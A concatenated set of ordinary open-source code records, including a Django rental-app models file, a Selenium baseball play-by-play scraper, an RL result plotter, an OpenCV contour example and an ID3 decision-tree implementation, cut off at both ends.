len(self.texto) == 0:\n return [0, '---']\n elif len(self.texto) < tamanho:\n return [1, self.texto]\n else:\n return [2, f'{self.texto[:tamanho]}...']\n\n\nclass TarefaManager(models.Manager):\n def tarefas_novas(self):\n tarefas_qs = self.filter(apagada=False)\n lista = []\n for tarefa in tarefas_qs:\n if tarefa.tarefa_nova() is True:\n lista.append(tarefa.pk)\n tarefas_novas = Tarefa.objects.filter(pk__in=lista)\n return tarefas_novas\n\n def tarefas_historico(self):\n tarefas_qs = self.filter(apagada=False)\n lista = []\n for tarefa in tarefas_qs:\n if tarefa.tarefa_nova() is False:\n lista.append(tarefa.pk)\n tarefas_novas = Tarefa.objects.filter(pk__in=lista)\n return tarefas_novas\n\n\nclass Tarefa(models.Model):\n do_usuario = models.ForeignKey('Usuario', null=False, on_delete=models.CASCADE)\n autor_classe = models.ForeignKey(ContentType, null=False, on_delete=models.CASCADE)\n objeto_id = models.PositiveIntegerField(null=False)\n content_object = GenericForeignKey('autor_classe', 'objeto_id')\n\n data_registro = models.DateTimeField(auto_now_add=True)\n lida = models.BooleanField(null=True)\n apagada = models.BooleanField(default=False)\n data_lida = models.DateTimeField(null=True)\n objects = TarefaManager()\n\n class Meta:\n ordering = ['-data_registro']\n\n def __str__(self):\n return f'Tarefa: classe:{self.autor_classe}/objeto_id:{self.objeto_id}'\n\n def autor_tipo(self):\n if self.autor_classe == ContentType.objects.get_for_model(Parcela):\n return 1\n elif self.autor_classe == ContentType.objects.get_for_model(Anotacoe):\n return 2\n elif self.autor_classe == ContentType.objects.get_for_model(Contrato):\n return 3\n elif self.autor_classe == ContentType.objects.get_for_model(Sugestao):\n return 4\n elif self.autor_classe == ContentType.objects.get_for_model(Locatario):\n return 5\n elif self.autor_classe == ContentType.objects.get_for_model(Slot):\n return 6\n\n def autor_tipo_display(self):\n if self.autor_classe == ContentType.objects.get_for_model(Parcela):\n return '🧾 Recibo'\n elif self.autor_classe == ContentType.objects.get_for_model(Anotacoe):\n return '🗒ï¸� Tarefa'\n elif self.autor_classe == ContentType.objects.get_for_model(Contrato):\n return '📃 Contrato'\n elif self.autor_classe == ContentType.objects.get_for_model(Sugestao):\n return 'âš ï¸� Aviso'\n elif self.autor_classe == ContentType.objects.get_for_model(Locatario):\n return '👨â€�💼 Locatário'\n elif self.autor_classe == ContentType.objects.get_for_model(Slot):\n return 'âš ï¸� Aviso'\n\n def tarefa_nova(self):\n # Vai retornar True ou none, True se o autor desta tarefa estiver marcado como concluido(ps: concluídos em\n # seus respectivos formatos; ex: recibo: 'recibo_entregue', ex: Anotação: 'feito', ex: contrato: 'em_posse',\n # ex: sugestão: 'neste caso utiliza o próprio parâmetro 'lida' desta model.'...)\n # Retorna none caso o objeto não exista, (caso gere um except)\n if self.autor_classe == ContentType.objects.get_for_model(Parcela):\n try:\n return True if self.content_object.recibo_entregue is False else False\n except:\n return None\n elif self.autor_classe == ContentType.objects.get_for_model(Anotacoe):\n try:\n return True if self.content_object.feito is False else False\n except:\n return None\n elif self.autor_classe == ContentType.objects.get_for_model(Contrato):\n try:\n return True if self.content_object.em_posse is False else False\n except:\n return None\n elif self.autor_classe == ContentType.objects.get_for_model(Sugestao):\n try:\n return False if self.lida else True\n except:\n return None\n elif self.autor_classe == ContentType.objects.get_for_model(Locatario):\n try:\n return True if self.content_object.temporario is True else False\n except:\n return None\n elif self.autor_classe == ContentType.objects.get_for_model(Slot):\n try:\n return False if self.lida else True\n except:\n return None\n\n def borda(self):\n if self.autor_classe == ContentType.objects.get_for_model(Parcela):\n return 'border-white'\n elif self.autor_classe == ContentType.objects.get_for_model(Anotacoe):\n return 'border-warning'\n elif self.autor_classe == ContentType.objects.get_for_model(Contrato):\n return 'border-primary'\n elif self.autor_classe == ContentType.objects.get_for_model(Sugestao):\n return 'border-success'\n elif self.autor_classe == ContentType.objects.get_for_model(Locatario):\n return 'border-secondary'\n elif self.autor_classe == ContentType.objects.get_for_model(Slot):\n return 'border-success'\n\n def texto(self):\n mensagem = ''\n if self.autor_classe == ContentType.objects.get_for_model(Parcela):\n try:\n parcela = self.content_object\n mensagem = f'O Pagamento de {parcela.do_contrato.do_locatario.primeiro_ultimo_nome().upper()}' \\\n f' referente à parcela de {data_ptbr(parcela.data_pagm_ref, \"F/Y\").upper()}' \\\n f'(Parcela {parcela.posicao()} de {parcela.do_contrato.duracao}) do contrato ' \\\n f'{parcela.do_contrato.codigo} em {parcela.do_contrato.do_imovel} foi detectado. '\\\n f'Confirme a entrega do recibo.'\n except:\n pass\n elif self.autor_classe == ContentType.objects.get_for_model(Anotacoe):\n try:\n tamanho_max_txt = 200\n nota = self.content_object\n cortado = f'{nota.texto[:tamanho_max_txt]}...'\n mensagem = f'''{nota.titulo}
{nota.texto if len(nota.texto) <= tamanho_max_txt else cortado}'''\n except:\n pass\n elif self.autor_classe == ContentType.objects.get_for_model(Contrato):\n try:\n contrato = self.content_object\n mensagem = f'''O contrato {contrato} foi criado com sucesso!

\n Depois de:
\n 1. Gerar e imprimir o documento referente(Gerar PDF de Contrato),
\n 2. Entregar ao locatário para reconhecimento em cartório, e
\n 3. Recebê-lo novamente com a firma reconhecida.
\n Confirme a posse de sua via no botão abaixo para ativá-lo no sistema.'''\n except:\n pass\n elif self.autor_classe == ContentType.objects.get_for_model(Sugestao):\n try:\n tamanho_max_txt = 200\n sugestao = self.content_object\n cortado = f'{sugestao.corpo[:tamanho_max_txt]}...'\n mensagem = f'''Sua sugestão foi aprovada e está disponível para votação:
\n \"{sugestao.corpo if len(sugestao.corpo) <= tamanho_max_txt else cortado}\"'''\n except:\n pass\n elif self.autor_classe == ContentType.objects.get_for_model(Locatario):\n try:\n locatario = self.content_object\n mensagem = f'''Um novo locatário se registrou:
\n Nome: {locatario.nome}
\n Telefone: {cel_format(locatario.telefone1)}
\n Email: {locatario.email}'''\n except:\n pass\n elif self.autor_classe == ContentType.objects.get_for_model(Slot):\n try:\n slot = self.content_object\n mensagem = f'''O imóvel {slot.imovel()} está desabilitado, por favor, acesse o painel para \n habilitá-lo.'''\n except:\n pass\n return mensagem\n\n def definir_apagada(self):\n self.apagada = True\n self.save(update_fields=['apagada'])\n\n def restaurar(self):\n self.apagada = False\n self.save(update_fields=['apagada'])\n\n def definir_nao_lida(self):\n self.lida = False\n self.data_lida = None\n self.data_registro = datetime.now()\n self.save(update_fields=['lida', 'data_registro'])\n\n\nlista_mensagem = (\n (1, 'Elogio'),\n (2, 'Reclamação'),\n (3, 'Dúvida'),\n (4, 'Report de bug'))\n\n\nclass DevMensagen(models.Model):\n do_usuario = models.ForeignKey('Usuario', null=True, blank=True, on_delete=models.CASCADE)\n\n data_registro = models.DateTimeField(auto_now=True)\n titulo = models.CharField(blank=False, max_length=100)\n mensagem = models.TextField(blank=False)\n tipo_msg = models.IntegerField(blank=False, choices=lista_mensagem)\n imagem = ResizedImageField(size=[1280, None], upload_to='mensagens_ao_dev/%Y/%m/', blank=True,\n validators=[tratar_imagem, FileExtensionValidator])\n\n class Meta:\n verbose_name_plural = 'Mensagens ao Dev'\n\n def __str__(self):\n return f'{self.do_usuario} - {self.titulo} - {self.data_registro}'\n\n\nclass Sugestao(models.Model):\n do_usuario = models.ForeignKey('Usuario', null=True, blank=True, on_delete=models.CASCADE)\n da_tarefa = models.OneToOneField('Tarefa', null=True, blank=True, on_delete=models.SET_NULL)\n\n data_registro = models.DateTimeField(auto_now=True)\n corpo = models.TextField(max_length=1500, blank=False, null=False, verbose_name='')\n imagem = ResizedImageField(size=[1280, None], upload_to='sugestoes_docs/%Y/%m/', blank=True,\n validators=[tratar_imagem, FileExtensionValidator], verbose_name='Imagem(opcional)')\n likes = models.ManyToManyField('Usuario', related_name='Likes', blank=True)\n implementada = models.BooleanField(default=False)\n aprovada = models.BooleanField(default=False)\n data_implementada = models.DateTimeField(blank=True, null=True)\n\n class Meta:\n verbose_name_plural = 'Sugestões'\n\n def __str__(self):\n return f'{self.do_usuario} - {self.corpo[:30]} - {self.data_registro}'\n\n def numero_de_likes(self):\n return self.likes.count()\n","repo_name":"fbsagat/Alugue_seu_imovel","sub_path":"home/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":56182,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"9520381908","text":"def selection_sort(elem,n):\n for i in range(n):\n minindex = i\n for j in range(i+1,n):\n if(elem[j] 0:\n # 取得対象(開始) のイニング決定\n jsonOpen = open(\"{0}/{1}.json\".format(fullGamePath, fileCount))\n loadedJson = json.load(jsonOpen)\n # 保存済みの最新イニング\n savedLatestInningTopBtm = loadedJson[\"liveHeader\"][\"inning\"]\n print(\"----- game: {0}, savedLatestInningTopBtm: {1} -----\".format(gameNo, savedLatestInningTopBtm))\n # 試合終了まで取得済みの場合、保存対象外\n if savedLatestInningTopBtm in [\"試合終了\", \"試合中止\", \"ノーゲーム\"]:\n continue\n elif savedLatestInningTopBtm in [\"試合前\"]:\n # ファイルカウントを0に戻す\n fileCount = 0\n print('not start game')\n # 試合途中まで取得済みの場合\n else:\n currentInning, currentTopBtm = savedLatestInningTopBtm.split(\"回\")\n fromInning = int(currentInning)\n # \n if currentTopBtm == \"表\":\n # 2回表〜9回表の場合は「裏」にする\n fromTopBtm = \"裏\"\n # 2回裏〜9回裏の場合は、1つイニングを進めて「表」にする\n elif currentTopBtm == \"裏\":\n fromInning = fromInning + 1\n fromTopBtm = \"表\"\n\n # 指定のイニングに遷移\n selectorInning = getInningSelector(fromInning, fromTopBtm)\n contentMain.find_element_by_css_selector(selectorInning).click()\n commonWait()\n\n # 取得対象(開始) 1回裏以降の場合\n if fromInning > 1 or fromTopBtm == \"裏\":\n #「戻る」ボタン押下\n selectorPrevButton = \"#replay .back a\"\n contentMain.find_element_by_css_selector(selectorPrevButton).click()\n commonWait()\n while 1:\n # 現在の打者数\n currentBatterCnt = util.getText(\"inningBatterCnt\")\n # 投手変更、守備変更がない場合\n if len(currentBatterCnt) > 0:\n #「次へ」ボタン押下\n selectorNextButton = \"#replay .next a\"\n contentMain.find_element_by_css_selector(selectorNextButton).click()\n commonWait()\n # シート変更の初期シーンに移動したら抜ける\n break\n # 依然シートの変更がある場合は「戻る」ボタン押下\n else:\n contentMain.find_element_by_css_selector(selectorPrevButton).click()\n commonWait() \n\n # 処理開始シーン定義\n scene = fileCount\n\n try:\n while 1:\n data = {}\n scene += 1\n startTime = time.time()\n\n # ------------ ライブヘッダ ------------\n data[\"liveHeader\"] = {\n \"inning\": util.getText(\"inning\"),\n \"away\": {\n \"teamInitial\": util.getText(\"teamInitialAway\"),\n \"currentScore\": util.getText(\"currentScoreAway\")\n },\n \"home\": {\n \"teamInitial\": util.getText(\"teamInitialHome\"),\n \"currentScore\": util.getText(\"currentScoreHome\")\n },\n \"count\": {\n \"b\": len(util.getText(\"countBall\")),\n \"s\": len(util.getText(\"countStrike\")),\n \"o\": len(util.getText(\"countOut\"))\n }\n }\n # ------------ /ライブヘッダ ------------\n\n # ------------ ライブボディ ------------\n liveBody = {}\n # 打撃結果概要欄\n liveBody[\"battingResult\"] = util.getText(\"battingResult\")\n liveBody[\"pitchingResult\"] = util.getText(\"pitchingResult\")\n\n # 取得対象が存在しない場合、保存して終了\n if liveBody[\"battingResult\"] in [\"試合終了\", \"試合中止\", \"試合前\"]:\n data[\"liveBody\"] = liveBody\n # save as json\n with open(\"{0}/{1}.json\".format(fullGamePath, scene), 'w') as f:\n json.dump(data, f, indent=2, ensure_ascii=False)\n break\n\n # 取得対象(終了) が存在する場合\n if toInning > 0 and len(toTopBtm) > 0:\n # 取得対象範囲を超えた場合、保存せず終了\n currentInning, currentTopBtm = data[\"liveHeader\"][\"inning\"].split(\"回\")\n if int(currentInning) == toInning and currentTopBtm == toTopBtm:\n break;\n\n # 塁状況\n onbaseInfoElem = util.getElems(\"onbaseInfo\")\n onbaseInfo = []\n for elem in onbaseInfoElem:\n onbaseInfo.append({\n \"base\": elem.get_attribute(\"id\"),\n \"player\": elem.text\n })\n liveBody[\"onbaseInfo\"] = onbaseInfo\n\n # ボールリスト概要 (\"#dakyu .bottom #nxt_batt .balllist\") は省略\n # 現在打者概要\n liveBody[\"currentBatterInfo\"] = {\n \"name\": util.getText(\"currentBatterName\"),\n \"playerNo\": util.getText(\"currentBatterPlayerNo\"),\n \"domainHand\": util.getText(\"currentBatterDomainHand\"),\n \"average\": util.getText(\"currentBatterRate\"),\n \"prevResult\": util.getText(\"currentBatterPrevResult\"),\n }\n # 登板投手概要\n liveBody[\"currentPicherInfo\"] = {\n \"name\": util.getText(\"currentPitcherName\"),\n \"playerNo\": util.getText(\"currentPitcherPlayerNo\"),\n \"domainHand\": util.getText(\"currentPitcherHand\"),\n \"pitch\": util.getText(\"currentPitchCount\"),\n \"vsBatterCount\": util.getText(\"currentPitcherVSBatterCount\"),\n \"pitchERA\": util.getText(\"currentPitchERA\"),\n }\n # 次の打者\n liveBody[\"nextBatter\"] = util.getText(\"nextBatter\")\n # イニング打者数\n liveBody[\"inningBatterCnt\"] = util.getText(\"inningBatterCnt\")\n\n data[\"liveBody\"] = liveBody\n # ------------ /ライブボディ ------------\n\n commonWait() # liveheader, livebody 取得後に wait\n\n pitchInfo = {}\n # 投球詳細\n pitchDetailsElem = util.getElems(\"pitchDetail\")\n pitchDetails = []\n for elem in pitchDetailsElem:\n pitchDetails.append({\n \"judgeIcon\": util.getSpecifyClass(elem, \"tr td:nth-child(1) span\").split(\" \")[1][-1:],\n \"pitchCnt\": util.getSpecifyText(elem, \"tr td:nth-child(2)\"),\n \"pitchType\": util.getSpecifyText(elem, \"tr td:nth-child(3)\"),\n \"pitchSpeed\": util.getSpecifyText(elem, \"tr td:nth-child(4)\"),\n \"pitchJudgeDetail\": util.getSpecifyText(elem, \"tr td:nth-child(5)\")\n })\n pitchInfo[\"pitchDetails\"] = pitchDetails\n\n # 投球コース\n pitchDetailsCourseElem = util.getElems(\"pitchingCourse\")\n allPitchCourse = []\n #\n for course in pitchDetailsCourseElem:\n courseDetailNum = re.findall(r'-?\\d+', course.get_attribute(\"style\"))\n # 0: top, 1: left\n allPitchCourse.append({\n \"top\": courseDetailNum[0],\n \"left\": courseDetailNum[1]\n })\n\n pitchInfo[\"allPitchCourse\"] = allPitchCourse\n\n def getGameResult(leftOrRight):\n return {\n \"title\": util.getText(\"gameResult\" + leftOrRight + \"Title\"),\n \"name\": util.getText(\"gameResult\" + leftOrRight + \"Name\"),\n \"domainHand\": util.getText(\"gameResult\" + leftOrRight + \"DomainHand\"),\n }\n\n # 対戦相手詳細\n pitchInfo[\"gameResult\"] = {\n \"left\": getGameResult(\"Left\"),\n \"right\": getGameResult(\"Right\"),\n }\n\n data[\"pitchInfo\"] = pitchInfo\n\n def createTeamInfo(homeAway):\n teamInfo = {}\n # チーム名\n teamInfo[\"name\"] = util.getTeamText(homeAway, \"teamName\")\n # 現在のオーダー\n teamOrder = []\n teamOrdeElem = util.getTeamElems(homeAway, \"teamOrder\")\n for elem in teamOrdeElem:\n if len(util.getSpecifyElems(elem, \"td\")) > 0:\n teamOrder.append({\n \"no\": util.getSpecifyText(elem, \"tr td:nth-child(1)\"),\n \"position\": util.getSpecifyText(elem, \"tr td:nth-child(2)\"),\n \"name\": util.getSpecifyText(elem, \"tr td:nth-child(3) a\"),\n \"domainHand\": util.getSpecifyText(elem, \"tr td:nth-child(4)\"),\n \"average\": util.getSpecifyText(elem, \"tr td:nth-child(5)\")\n })\n teamInfo[\"order\"] = teamOrder\n # バッテリー\n battelyInfoElem = util.getTeamElems(homeAway, \"teamBattery\")\n battelyInfo = \"\"\n for elem in battelyInfoElem:\n battelyInfo += elem.text\n teamInfo[\"batteryInfo\"] = battelyInfo\n # 本塁打\n homerunInfoElem = util.getTeamElems(homeAway, \"teamHomerun\")\n homerunInfo = \"\"\n for elem in homerunInfoElem:\n homerunInfo += elem.text\n teamInfo[\"homerunInfo\"] = homerunInfo\n\n def createBenchMemberInfo(memgersElem):\n benchMemberInfo = []\n for elem in memgersElem:\n if elem.get_attribute(\"class\") == \"bb-splitsTable__row\":\n benchMemberInfo.append({\n \"name\": util.getSpecifyText(elem, \"tr td:nth-child(1) a\"),\n \"domainHand\": util.getSpecifyText(elem, \"tr td:nth-child(2)\"),\n \"average\": util.getSpecifyText(elem, \"tr td:nth-child(3)\")\n })\n return benchMemberInfo\n\n # ベンチ入りメンバー(投手)\n teamInfo[\"benchPitcher\"] = createBenchMemberInfo(util.getTeamElems(homeAway, \"benchPitcherInfo\"))\n # ベンチ入りメンバー(捕手)\n teamInfo[\"benchCatcher\"] = createBenchMemberInfo(util.getTeamElems(homeAway, \"benchCatcherInfo\"))\n # ベンチ入りメンバー(内野手)\n teamInfo[\"benchInfielder\"] = createBenchMemberInfo(util.getTeamElems(homeAway, \"benchInfielderInfo\"))\n # ベンチ入りメンバー(外野手)\n teamInfo[\"benchOutfielder\"] = createBenchMemberInfo(util.getTeamElems(homeAway, \"benchOutfielderInfo\"))\n\n return teamInfo\n \n data[\"homeTeamInfo\"] = createTeamInfo(\"homeTeamElemId\")\n data[\"awayTeamInfo\"] = createTeamInfo(\"awayTeamElemId\")\n\n # save as json\n with open(\"{0}/{1}.json\".format(fullGamePath, scene), 'w') as f:\n json.dump(data, f, indent=2, ensure_ascii=False)\n\n print(\"----- [done] date: {0}, gameNo: {1}, scene: {2:3d}, inning: {3}, {4}アウト, {5:3.1f}[sec] -----\".format(\n dateStr,\n gameNo,\n scene,\n data[\"liveHeader\"][\"inning\"],\n data[\"liveHeader\"][\"count\"][\"o\"],\n time.time() - startTime\n ))\n\n #「次へ」ボタン押下\n selectorNextButton = \"#replay .next a\"\n contentMain.find_element_by_css_selector(selectorNextButton).click()\n commonWait()\n\n except TimeoutException as te:\n print(te)\n print(\"----- [error] date: {0}, gameNo: {1}, scene: {2:3d}, inning: {3}, {4}アウト, {5:3.1f}[sec] -----\".format(\n dateStr,\n gameNo,\n scene,\n data[\"liveHeader\"][\"inning\"],\n data[\"liveHeader\"][\"count\"][\"o\"],\n time.time() - startTime\n ))\n\n targetDate = targetDate + datetime.timedelta(days=1)\n util = Util(driver)\n\n driver.close()\n driver.quit()\n print(\"----- finished time: {0} -----\\n\\n\".format(datetime.datetime.now().strftime(\"%Y/%m/%d %H:%M:%S\")))\n\nexcept:\n driver.close()\n driver.quit()\n\n import traceback\n traceback.print_exc()\n","repo_name":"IsaUmetsu/py_baseball","sub_path":"game_scenes.py","file_name":"game_scenes.py","file_ext":"py","file_size_in_byte":19609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"12149555563","text":"import sys\n\nn = int(sys.stdin.readline())\nfor _ in range(n):\n stk = 0\n mun = sys.stdin.readline().rstrip()\n mun = list(mun)\n for i in mun:\n if i == '(':\n stk += 1\n elif i == ')':\n stk -= 1\n if stk < 0:\n print('NO')\n break\n if stk > 0:\n print('NO')\n elif stk == 0:\n print('YES')\n","repo_name":"Jungwoo-20/CodingTestStudy","sub_path":"백준/9102.py","file_name":"9102.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"19336000911","text":"import numpy as np\nimport json\nfrom pprint import pprint\nimport math\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom test_json import process_json\n\nEPOCH = 1\n\ndef __get__data(file_path=None, print_data=False):\n\n\tassert file_path != None\n\n\tdata = json.load(open(file_path))\n\tprint_data = {} \n\n\tepi_success = []\n\tepi_loss = []\n\tcurr_epoch = 0\n\tfor episode,duration,episode_reward,loss,mae,mq,nbes,nb_steps,success_info in zip(data['episode'],data['duration'],data['episode_reward'],data['loss'],data['mean_absolute_error'],data['mean_q'],data['nb_episode_steps'],data['nb_steps'],data['infos']):\n\n\t\t#book keeping\n\t\tsuccess_val = float(success_info.split(':')[1])\n\t\tepi_success.append(success_val)\n\t\tepi_loss.append(0 if math.isnan(loss) else loss)\n\t\tif(episode%EPOCH==0):\n\t\t\tif math.isnan(mq):\n\t\t\t\tmq=0\n\t\t\tsuccess_val_mean = np.mean(epi_success)\n\t\t\tsuccess_val_std = np.std(epi_success)\n\t\t\tloss_mean = np.mean(epi_loss)\n\t\t\t# can add more data if needed\n\n\t\t\ttemp_data = [('epoch', curr_epoch), ('success_mean', success_val_mean), ('success_std', success_val_std), ('loss_mean', loss_mean)]\n\t\t\tfor key, value in temp_data:\n\t\t\t\tif key not in print_data:\n\t\t\t\t print_data[key] = []\n\t\t\t\tprint_data[key].append(value)\n\n\t\t\t#reset\n\t\t\tepi_success = []\n\t\t\tepi_loss = []\n\t\t\tcurr_epoch += 1\n\t\t\t#validate\n\t\t\tif(print_data==True):\n\t\t\t\ttemplate = 'episode: {episode}, duration: {duration:.3f}s, episode_reward: {episode_reward:.3f}, loss: {loss:.3f}, mean_q: {mean_q:.3f}, success_rate: {success_info:.3f}'\n\t\t\t\tvariables = {\n\t\t\t 'nb_steps': nb_steps,\n\t\t\t 'episode': episode + 1,\n\t\t\t 'duration': duration,\n\t\t\t 'mean_q': mq,\n\t\t\t 'episode_steps': nbes,\n\t\t\t 'sps': float(nbes) / duration,\n\t\t\t 'loss':loss,\n\t\t\t 'episode_reward': episode_reward,\n\t\t\t 'success_info':float(success_val)\n\t\t\t }\n\t\t\t\tprint(template.format(**variables))\n\treturn print_data\n\ndef plot_af(file_path=None,preprocess_json=preprocess_json,save_file_name='temp_plot.png',plot_what='success',plot_num=0,label=None,color_vector=['blue', 'red', 'black', 'green', 'magenta', 'green','cyan', 'yellow', 'brown','gray','olive','orange','pink','salmon','hotpink','palegoldenrod','mediumseagreen','sienna','tomato']):\n\n\tif(file_path==None):\n\t\tprint('could not find a path to training .json file')\n\n\telse:\n\t\tif(preprocess_json):\n\t\t\tprocess_json(file_path)\n\t\t\tfile_path = \"data/temp.json\"\n\t\tprint_data = __get__data(file_path)\t#print_data has form {'epoch': [], 'success_mean': [], 'success_std': []}\n\t\textension = 'success_rate'\n\t\tif(plot_what=='success'):\n\t\t\tprint(\"Plotting accuracy...\")\n\t\t\ty = np.asarray(print_data['success_mean'])\n\t\t\tx = np.asarray(print_data['epoch'])\n\t\t\te = np.asarray(print_data['success_std'])\n\t\t\tif(e.shape[0]>1):\n\t\t\t\tplot, = plt.plot(np.squeeze(x),np.squeeze(y),label=label,linewidth=1.0,color=color_vector[plot_num])\n\t\t\t\tplt.fill_between(np.squeeze(x), np.squeeze(y)-np.squeeze(e), np.squeeze(y)+np.squeeze(e), color=color_vector[plot_num], alpha=0.2, label=label)\n\t\t\telse:\n\t\t\t\tplot = None\n\t\t\t\n\t\telif(plot_what=='loss'):\n\t\t\tprint(\"Plotting loss...\")\n\t\t\ty = np.asarray(print_data['loss_mean'])\n\t\t\tx = np.asarray(print_data['epoch'])\n\t\t\tplt.plot(np.squeeze(x), np.squeeze(y))\n\t\t\textension = 'train_loss'\n\t\tprint(\"Plot saved.\")\n\t\treturn plot\n\nif __name__ == '__main__':\n\tif(len(sys.argv)==2):\n\t\tpath = str(sys.argv[1])\n\t##graph0\t\n\t# label_names = ['DDPG', 'PER']\n\t##graph1\n\t# label_names = ['Vanilla DDPG','\"episode\" strategy with K=1', '\"episode\" strategy with K=4', '\"episode\" strategy with K=8', '\"future\" strategy with K=1', '\"future\" strategy with K=4', '\"future\" strategy with K=8']\n\t##graph 2\n\t# label_names = ['\"episode\" strategy with K=4', '\"episode\" strategy with K=8', '\"episode\" strategy with K=24', '\"future\" strategy with K=4', '\"future\" strategy with K=8', '\"future\" strategy with K=24']\n\t##graph3_1\n\t# label_names = ['\"episode\" strategy with alpha=0.3', '\"episode\" strategy with alpha=0.7', '\"episode\" strategy with alpha=0.9', '\"episode\" strategy with alpha=0']\n\t##graph3_2\n\t# label_names = ['\"future\" strategy with alpha=0.3', '\"future\" strategy with alpha=0.7', '\"future\" strategy with alpha=0.9', '\"future\" strategy with alpha=0']\n\t##graph4\n\t# label_names = ['\"episode\" strategy with K=4', '\"episode\" strategy with K=8', '\"future\" strategy with K=4', '\"future\" strategy with K=8']\n\t##graph5\n\t# label_names = ['Unprioritized Actors', '1 Actor Exploring - 1 Actor Exploiting', 'Both Actors Exploiting', 'Dynamic Actors']\n\t##graph6\n\t# label_names = ['Memory= 10000, Batch Size = 2', 'Memory= 10000, Batch Size = 8', 'Memory= 50000, Batch Size = 2', 'Memory= 50000, Batch Size = 8', 'Memory= 50000, Batch Size = 64']\n\t##graph8\n\tlabel_names = ['Vanilla-DDPG','DDPG+PER','DDPG+HER','DDPG+PHER','DDPG+DPHER']\n\t# graph_12\n\t# label_names = ['Memory= 5000, Batch Size = 32', 'Memory= 10000, Batch Size = 2', 'Memory= 10000, Batch Size = 8', 'Memory= 50000, Batch Size = 2', 'Memory= 50000, Batch Size = 8', 'Memory= 50000, Batch Size = 64']\n\n\tplt.clf()\n\tplot_handles = []\n\tf = open(path,'r')\n\tfor i, (exp_name,label_name) in enumerate(zip(f.readlines(), label_names)):\n\t\tif(exp_name!=\"\\n\"):\n\t\t\texp_path = os.path.join(\"data\", exp_name)\n\t\t\tplot = plot_af(exp_path[:-1], plot_what='success', plot_num=i,label=label_name)\n\t\t\tif plot!=None:\n\t\t\t\tplot_handles.append(plot)\n\n\tplt.xlabel('EPOCHS',size=14)\n\tplt.ylabel('Accuracy',size=14)\n\tplt.legend(handles=plot_handles, loc=4, prop={'size': 8})\n\tplt.savefig(path[:-4]+'.png', bbox_inches='tight', dpi=300)\n","repo_name":"ojasjoshi/distributive-prioritised-hindsight-experience-replay","sub_path":"core_distributive/rl/check_json.py","file_name":"check_json.py","file_ext":"py","file_size_in_byte":5559,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"23230050297","text":"from cvp.utils.image_utils import show\nfrom cvp.shape.countours import get_contours_from_thresh, get_extreme_points\nfrom cvp.utils.parsing_utils import get_single_image_from_command_line\nimport cv2.cv2 as cv\n\n\ndef main():\n image = get_single_image_from_command_line()\n gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n blurred = cv.GaussianBlur(gray, (5, 5), 0)\n thresh = cv.threshold(blurred, 50, 255, cv.THRESH_BINARY)[1]\n eroded = cv.erode(thresh, None, iterations=2)\n diluted = cv.dilate(eroded, None, iterations=2)\n show(diluted)\n\n contours = get_contours_from_thresh(diluted)\n max_contour = max(contours, key=cv.contourArea)\n cv.drawContours(image, [max_contour], -1, (255, 255, 255), 2)\n\n ext_bot, ext_left, ext_right, ext_top = get_extreme_points(max_contour)\n\n cv.circle(image, ext_left, 8, (255, 0, 0), -1)\n cv.circle(image, ext_right, 8, (0, 255, 0), -1)\n cv.circle(image, ext_top, 8, (0, 0, 255), -1)\n cv.circle(image, ext_bot, 8, (255, 255, 0), -1)\n show(image)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"doron-st/computer-vision","sub_path":"cvp/applications/extreme_points_of_contour.py","file_name":"extreme_points_of_contour.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"25279071715","text":"from typing import List, Union\nimport numpy as np\nfrom networkx import DiGraph\nfrom pandas import DataFrame, Series\n\nfrom generics import GenericNode, GenericClass, GenericModel\n\n\nclass Id3Node(GenericNode):\n pass\n\n\nclass Id3Class(GenericClass, Id3Node):\n pass\n\n\nclass Id3Model(GenericModel[Id3Node]):\n def _browse_tree(self, node: Id3Node, attributes: Series):\n edges = self.tree.out_edges(node, 'value')\n candidates = [child for p, child, value in edges if value == attributes[node.name]]\n\n if len(candidates) == 0:\n raise AttributeError(\n \"no candidate for {} in the given series with the value {}\".format(node.name, attributes[node.name])\n )\n\n successor = candidates[0]\n\n if type(successor) == Id3Class:\n return successor.value\n\n return self._browse_tree(successor, attributes)\n\n\ndef generate_id3_tree(data: DataFrame):\n tree = DiGraph(directed=True)\n root = next_node(data, tree)\n return Id3Model(tree, root)\n\n\ndef next_node(data: DataFrame, tree: DiGraph) -> [Id3Node]:\n # for now we assume that there is data\n rows, cols_count = data.shape\n\n if rows == 0: # impossible cas but for security\n return None\n if np.unique(data.iloc[:, -1].values).size == 1:\n return Id3Class(data.columns[-1], data.iloc[0, -1])\n\n # gather gains\n gains = [information_gain(data.to_numpy(), a) for a in range(0, cols_count-1)]\n # find the index of the column with best gain\n a = gains.index(max(gains))\n # retrieve column name from the column index\n column = data.columns[a]\n # get all possible values of the attribute and remove duplicates\n edges = set(data.iloc[:, a])\n # create a node for the actual attribute\n node = Id3Node(column, edges)\n tree.add_node(node)\n\n for edge in edges:\n subset = drop_attribute_value(data, column, edge)\n # Continue recursive generation of the tree\n child = next_node(subset, tree)\n node.child[edge] = child\n tree.add_edge(node, child, value=edge)\n\n return node\n\n\ndef drop_attribute_value(df, attribute, value):\n # Get index of rows that don't match the edge\n indexes = df[df[attribute] != value].index\n # Remove those rows\n subset = df.drop(indexes)\n # Remove attribute\n subset.drop(columns=attribute, inplace=True)\n return subset\n\n\ndef split_dataset(dataset: np.ndarray, index, as_dict=False) -> Union[dict, List[np.ndarray]]:\n \"\"\"\n Extract subsets by splitting the dataset for each value of the attribute\n at the specified index. Either an attribute or the class\n :param dataset: The dataset to slit\n :param index: the index of the attribute to split upon (or -1 for the class)\n :param as_dict: Either to return a dict with the attribute value as key or the array without attributes value\n :return: subsets as np.ndarray\n :rtype: np.ndarray[] is as_dict equals to false, dict otherwise\n \"\"\"\n classes = set(dataset[:, index])\n result = [dataset[dataset[:, index] == class_] for class_ in classes]\n if as_dict:\n return dict(zip(classes, result))\n else:\n return 